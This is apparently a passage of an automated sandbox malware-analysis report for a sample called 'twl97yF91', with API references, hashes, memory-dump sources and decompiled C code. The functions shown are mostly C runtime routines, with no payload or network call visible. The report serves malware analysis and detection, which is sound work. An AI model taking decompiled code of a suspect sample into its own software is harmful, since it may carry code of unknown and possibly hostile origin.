                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC426F
                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02CC428C
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00422D38), ref: 02CC42B7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction ID: df74eed8aa62d6f724d738374d20d0e65367a8ab6c3f59b653d3d22975a05042
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8014E31E01610EBD739AB54D4067DEB760BF84724F61801DD814A7194C7749681DFC5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				LONG* _t21;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				LONG* _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t35 = __eflags;
                                                                                                                                                                                                          				_t29 = __edx;
                                                                                                                                                                                                          				_t25 = __ebx;
                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                          				_push(0x421490);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                          				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                          					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                          					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                          					__eflags = _t33 -  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                          						__eflags = _t33;
                                                                                                                                                                                                          						if(_t33 != 0) {
                                                                                                                                                                                                          							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                          							__eflags = _t23;
                                                                                                                                                                                                          							if(_t23 == 0) {
                                                                                                                                                                                                          								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									_push(_t33);
                                                                                                                                                                                                          									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t21 =  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                          						_t33 =  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                          						InterlockedIncrement(_t33);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                          					E00414067();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                          					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t33);
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                                          0x00413fcc
                                                                                                                                                                                                          0x00413fce
                                                                                                                                                                                                          0x00413fd3
                                                                                                                                                                                                          0x00413fdd
                                                                                                                                                                                                          0x00413fdf
                                                                                                                                                                                                          0x00413fe7
                                                                                                                                                                                                          0x00414008
                                                                                                                                                                                                          0x0041400e
                                                                                                                                                                                                          0x00414012
                                                                                                                                                                                                          0x00414015
                                                                                                                                                                                                          0x00414018
                                                                                                                                                                                                          0x0041401e
                                                                                                                                                                                                          0x00414020
                                                                                                                                                                                                          0x00414022
                                                                                                                                                                                                          0x00414025
                                                                                                                                                                                                          0x0041402b
                                                                                                                                                                                                          0x0041402d
                                                                                                                                                                                                          0x0041402f
                                                                                                                                                                                                          0x00414035
                                                                                                                                                                                                          0x00414037
                                                                                                                                                                                                          0x00414038
                                                                                                                                                                                                          0x0041403d
                                                                                                                                                                                                          0x00414035
                                                                                                                                                                                                          0x0041402d
                                                                                                                                                                                                          0x0041403e
                                                                                                                                                                                                          0x00414043
                                                                                                                                                                                                          0x00414046
                                                                                                                                                                                                          0x0041404c
                                                                                                                                                                                                          0x00414050
                                                                                                                                                                                                          0x00414050
                                                                                                                                                                                                          0x00414056
                                                                                                                                                                                                          0x0041405d
                                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                                          0x00413fef
                                                                                                                                                                                                          0x00413ff4
                                                                                                                                                                                                          0x00413ff8
                                                                                                                                                                                                          0x00413ffd
                                                                                                                                                                                                          0x00414005

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(02E31638), ref: 00414050
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $2$l
                                                                                                                                                                                                          • API String ID: 0-3132104027
                                                                                                                                                                                                          • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                          • Instruction ID: bc58b239418278565ed197266239350c603c9d555335f029feeae00e40de280b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C3358442688EDF399A178C883F87BB2AB4131AF3801CEC49D66292C7B54BC7CF45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __calloc_crt
                                                                                                                                                                                                          • String ID: P$B$`$B
                                                                                                                                                                                                          • API String ID: 3494438863-235554963
                                                                                                                                                                                                          • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                          • Instruction ID: 80c7bfa7622fb9f50169b1aa87c5df75454d0a626ebd00caf64b915e2304a63a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011E3313086215BE7368F3DBC50BA52396EFC5328F68422EF615CA7A4E770D8824A58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                          			E00413610() {
                                                                                                                                                                                                          				signed long long _v12;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed long long _v28;
                                                                                                                                                                                                          				signed char _t8;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					_v20 =  *0x41fb50;
                                                                                                                                                                                                          					_v28 =  *0x41fb48;
                                                                                                                                                                                                          					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                          					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                          					asm("fld1");
                                                                                                                                                                                                          					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                          					asm("fnstsw ax");
                                                                                                                                                                                                          					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                          					if(__eax == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						return __eax;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x00413615
                                                                                                                                                                                                          0x0041361d
                                                                                                                                                                                                          0x00413634
                                                                                                                                                                                                          0x004135e0
                                                                                                                                                                                                          0x004135e9
                                                                                                                                                                                                          0x004135f5
                                                                                                                                                                                                          0x004135f8
                                                                                                                                                                                                          0x004135fb
                                                                                                                                                                                                          0x004135fd
                                                                                                                                                                                                          0x00413600
                                                                                                                                                                                                          0x00413605
                                                                                                                                                                                                          0x0041360f
                                                                                                                                                                                                          0x00413607
                                                                                                                                                                                                          0x0041360b
                                                                                                                                                                                                          0x0041360b
                                                                                                                                                                                                          0x0041361f
                                                                                                                                                                                                          0x00413625
                                                                                                                                                                                                          0x0041362d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041362f
                                                                                                                                                                                                          0x0041362f
                                                                                                                                                                                                          0x00413633
                                                                                                                                                                                                          0x00413633
                                                                                                                                                                                                          0x0041362d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02CB1B6D
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02CB1B96
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02CB1BA7
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02CB1BBF
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02CB1BE7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction ID: 6c128a61f589ec48abd4b1c1dbd1aa20a0c4ec541379e94615eecc77a23357a0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 651104715003547BD3309715CC98FA77F2CEFC6BA8F048114FD489B281D761A904C6B4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 02CBC9E3
                                                                                                                                                                                                          • __locking.LIBCMT ref: 02CBC9F8
                                                                                                                                                                                                            • Part of subcall function 02CBC228: __getptd_noexit.LIBCMT ref: 02CBC228
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 630670418-0
                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction ID: cb6b54c8b3d0be585b54e9950f1541efa7fafcba0538b996c270bbf4d0f7f363
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4951C671E00209AFDB12CF69C980BDDBBB1FF45358F14816AD915AB281D730EB81DB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				char _t82;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				intOrPtr* _t86;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                          				signed char _t98;
                                                                                                                                                                                                          				signed int _t99;
                                                                                                                                                                                                          				intOrPtr _t102;
                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                          				intOrPtr* _t104;
                                                                                                                                                                                                          				signed int _t111;
                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t105 = __esi;
                                                                                                                                                                                                          				_t97 = __edx;
                                                                                                                                                                                                          				_t104 = _a4;
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				_t121 = _t104;
                                                                                                                                                                                                          				if(_t104 != 0) {
                                                                                                                                                                                                          					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                          					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                          					_v8 = _t70;
                                                                                                                                                                                                          					if(__eflags < 0) {
                                                                                                                                                                                                          						 *(_t104 + 4) = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					_push(_t87);
                                                                                                                                                                                                          					_push(_t70);
                                                                                                                                                                                                          					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                          					__eflags = _t71 - _t87;
                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                          					if(_t71 < _t87) {
                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                          						return _t71 | 0xffffffff;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                          						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                          						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                          							_t73 =  *_t104;
                                                                                                                                                                                                          							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                          							_push(_t105);
                                                                                                                                                                                                          							_v16 = _t73 - _t92;
                                                                                                                                                                                                          							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                          							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                          								__eflags = _t98;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									L15:
                                                                                                                                                                                                          									__eflags = _v12 - _t87;
                                                                                                                                                                                                          									if(_v12 != _t87) {
                                                                                                                                                                                                          										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                          										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                          											_t75 = _v16 + _v12;
                                                                                                                                                                                                          											__eflags = _t75;
                                                                                                                                                                                                          											L41:
                                                                                                                                                                                                          											return _t75;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                          										__eflags = _t99 - _t87;
                                                                                                                                                                                                          										if(_t99 != _t87) {
                                                                                                                                                                                                          											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                          											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                          											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                          											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                          												L39:
                                                                                                                                                                                                          												_t66 =  &_v12;
                                                                                                                                                                                                          												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                          												__eflags =  *_t66;
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_push(2);
                                                                                                                                                                                                          											_push(0);
                                                                                                                                                                                                          											_push(_v8);
                                                                                                                                                                                                          											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(_v12);
                                                                                                                                                                                                          												_push(_v8);
                                                                                                                                                                                                          												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                          												__eflags = _t81;
                                                                                                                                                                                                          												if(_t81 >= 0) {
                                                                                                                                                                                                          													_t82 = 0x200;
                                                                                                                                                                                                          													__eflags = _a4 - 0x200;
                                                                                                                                                                                                          													if(_a4 > 0x200) {
                                                                                                                                                                                                          														L35:
                                                                                                                                                                                                          														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                          														L36:
                                                                                                                                                                                                          														_a4 = _t82;
                                                                                                                                                                                                          														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                          														L37:
                                                                                                                                                                                                          														if(__eflags != 0) {
                                                                                                                                                                                                          															_t63 =  &_a4;
                                                                                                                                                                                                          															 *_t63 = _a4 + 1;
                                                                                                                                                                                                          															__eflags =  *_t63;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                          													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                          													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                          														goto L35;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                          													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                          														goto L36;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L35;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L31:
                                                                                                                                                                                                          												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                          											_t96 = _a4 + _t84;
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												__eflags = _t84 - _t96;
                                                                                                                                                                                                          												if(_t84 >= _t96) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                          												if( *_t84 == 0xa) {
                                                                                                                                                                                                          													_t44 =  &_a4;
                                                                                                                                                                                                          													 *_t44 = _a4 + 1;
                                                                                                                                                                                                          													__eflags =  *_t44;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t84 = _t84 + 1;
                                                                                                                                                                                                          												__eflags = _t84;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v16 = _t87;
                                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t75 = _v16;
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                          								 *_t81 = 0x16;
                                                                                                                                                                                                          								goto L31;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                          							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                          							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                          							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t103 = _t92;
                                                                                                                                                                                                          							__eflags = _t103 - _t73;
                                                                                                                                                                                                          							if(_t103 >= _t73) {
                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t115 = _t73;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                          								if( *_t103 == 0xa) {
                                                                                                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                                                                                                          									_t87 = 0;
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t103 = _t103 + 1;
                                                                                                                                                                                                          								__eflags = _t103 - _t115;
                                                                                                                                                                                                          							} while (_t103 < _t115);
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				 *_t86 = 0x16;
                                                                                                                                                                                                          				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}






























                                                                                                                                                                                                          0x0040c748
                                                                                                                                                                                                          0x0040c748
                                                                                                                                                                                                          0x0040c752
                                                                                                                                                                                                          0x0040c755
                                                                                                                                                                                                          0x0040c757
                                                                                                                                                                                                          0x0040c759
                                                                                                                                                                                                          0x0040c77c
                                                                                                                                                                                                          0x0040c781
                                                                                                                                                                                                          0x0040c785
                                                                                                                                                                                                          0x0040c788
                                                                                                                                                                                                          0x0040c78a
                                                                                                                                                                                                          0x0040c78a
                                                                                                                                                                                                          0x0040c78d
                                                                                                                                                                                                          0x0040c78f
                                                                                                                                                                                                          0x0040c790
                                                                                                                                                                                                          0x0040c791
                                                                                                                                                                                                          0x0040c799
                                                                                                                                                                                                          0x0040c79b
                                                                                                                                                                                                          0x0040c79e
                                                                                                                                                                                                          0x0040c773
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                                          0x0040c7a3
                                                                                                                                                                                                          0x0040c7a9
                                                                                                                                                                                                          0x0040c7b3
                                                                                                                                                                                                          0x0040c7b5
                                                                                                                                                                                                          0x0040c7b8
                                                                                                                                                                                                          0x0040c7bd
                                                                                                                                                                                                          0x0040c7c0
                                                                                                                                                                                                          0x0040c7c3
                                                                                                                                                                                                          0x0040c806
                                                                                                                                                                                                          0x0040c808
                                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                                          0x0040c7fc
                                                                                                                                                                                                          0x0040c81a
                                                                                                                                                                                                          0x0040c81e
